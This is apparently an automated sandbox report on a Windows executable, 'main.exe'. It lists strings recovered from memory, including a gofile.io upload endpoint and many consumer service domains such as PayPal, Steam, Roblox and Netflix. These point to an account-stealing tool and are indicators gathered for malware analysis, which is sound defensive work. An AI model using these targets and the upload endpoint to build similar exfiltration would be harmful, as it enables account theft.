Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023880824.000001E894794000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985448658.000001E894790000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982748630.000001E89478F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894790000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013797499.000001E894790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/32900
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gmail.com)
Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hbo.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hotmail.com)
Source: main.exe, 00000002.00000003.1994855674.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003396948.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020672387.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980969299.000001E893C02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894850000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985699146.000001E89484B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024088246.000001E8947D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://i.imgur.com/jJES3AX.png
Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://instagram.com)
Source: main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://markupsafe.palletsprojects.com/
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://markupsafe.palletsprojects.com/changes/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://minecraft.net)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://netflix.com)
Source: main.exe, 00000002.00000003.1998028650.000001E894BC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://origin.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com)
Source: main.exe, 00000002.00000003.2001762476.000001E8945A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://palletsprojects.com/donate
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://paypal.com)
Source: main.exe, 00000002.00000002.2017333313.000001E8933F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780566116.000001E89356F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779749185.000001E89356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://playstation.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pornhub.com)
Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://riotgames.com)i75802
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://roblox.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sellix.io)
Source: main.exe, 00000002.00000003.1785741511.000001E8939DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978563125.000001E893A0C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012124595.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)
Source: main.exe, 00000002.00000003.2013074087.000001E89396A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013387739.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stake.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://store1.gofile.io/contents/uploadfile
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)
Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)
Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://upload.pypi.org/legacy/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: main.exe, 00000002.00000003.1975924116.000001E893326000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008458443.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012911590.000001E89334C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985986835.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977459782.000001E893349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: main.exe, 00000002.00000003.1778406388.000001E893355000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778179908.000001E893355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894787000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: main.exe, 00000002.00000002.2024904909.000001E894A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xbox.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Detected potential crypto function

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B1B38	0_2_00007FF7333B1B38
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B7BD4	0_2_00007FF7333B7BD4
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398020	0_2_00007FF733398020
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B6E70	0_2_00007FF7333B6E70
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A2420	0_2_00007FF7333A2420
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A4450	0_2_00007FF7333A4450
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A6CF0	0_2_00007FF7333A6CF0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A3B88	0_2_00007FF7333A3B88
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AEB24	0_2_00007FF7333AEB24
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B531C	0_2_00007FF7333B531C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A132C	0_2_00007FF7333A132C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339A26D	0_2_00007FF73339A26D
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733399A34	0_2_00007FF733399A34
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B2AE4	0_2_00007FF7333B2AE4
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A1128	0_2_00007FF7333A1128
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333BA998	0_2_00007FF7333BA998
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A9020	0_2_00007FF7333A9020
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B70EC	0_2_00007FF7333B70EC
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339989B	0_2_00007FF73339989B
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A3F8C	0_2_00007FF7333A3F8C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A0F1C	0_2_00007FF7333A0F1C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A173C	0_2_00007FF7333A173C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A3750	0_2_00007FF7333A3750
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A27B8	0_2_00007FF7333A27B8
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AEFB8	0_2_00007FF7333AEFB8
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B4E80	0_2_00007FF7333B4E80
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B1B38	0_2_00007FF7333B1B38
